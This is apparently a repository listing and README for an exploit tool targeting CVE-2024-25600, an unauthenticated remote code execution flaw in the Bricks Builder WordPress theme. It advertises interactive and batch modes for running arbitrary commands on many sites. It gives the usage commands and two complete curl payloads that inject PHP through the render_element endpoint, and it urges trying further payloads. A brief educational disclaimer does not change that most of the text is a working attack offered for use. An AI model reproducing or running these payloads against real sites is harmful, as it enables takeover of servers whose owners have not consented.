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CVE-2024-25600 PoC — WordPress Plugin Bricks Builder Theme 安全漏洞

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Associated Vulnerability
Title:WordPress Plugin Bricks Builder Theme 安全漏洞 (CVE-2024-25600)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Bricks Builder Theme 1.9.6版本存在安全漏洞,该漏洞源于允许攻击者通过利用随机数泄漏来绕过身份验证来执行任意 PHP 代码。
Description
This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.
Readme
# CVE-2024-25600 Exploit Tool 🚀

## Description 📝

This tool 🛠️ is designed to exploit the CVE-2024-25600 vulnerability 🕳️ found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites 💻. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.

## Features 🌟

- **Interactive Mode**: Engage with the target website in real-time 🕹️.
- **Batch Mode**: Scan and exploit multiple websites from a list 📋.
- **Command Execution**: Execute arbitrary commands on the target server ⚙️.

## Installation 🛠️

1. Clone this repository to your local machine 🖥️ using `git clone`.
2. Navigate to the directory of the cloned repository.
3. Install the required Python libraries using `pip install -r requirements.txt`.

## Usage 📖

### Interactive Mode 🎮

1. Run the tool with `python exploit.py -u <URL>` to start interactive mode.
2. Follow the on-screen prompts to send commands to the target server.

### Batch Mode 📊

1. Prepare a text file with a list of target URLs.
2. Run the tool with `python exploit.py -l <file_path>` to scan and exploit the listed sites.

## Proof of Concept (PoC) 📝

The base PoC provided by the disclosure is as follows:

```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'
```

**Update**: Second PoC (more reliable)

```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'
```

> It's possible that additional payloads could yield better results. If my exploit or proof of concept does not work for you, I encourage you to experiment with alternative payloads to find a more effective solution.

Replace `[HOST]` with the target website and `[NONCE]` with the nonce value retrieved from the site.

## Reference 📖

For more information about the CVE-2024-25600 vulnerability, please refer to the detailed disclosure at [Snicco.io](https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6).

## Disclaimer ⚠️

The information provided in this README is for educational purposes only. Unauthorized hacking into websites or networks is illegal and unethical. 🚫

## Acknowledgements 🙏

Kudos to the security researchers who discovered and reported this vulnerability, providing the community with information and tools to help secure their web applications.
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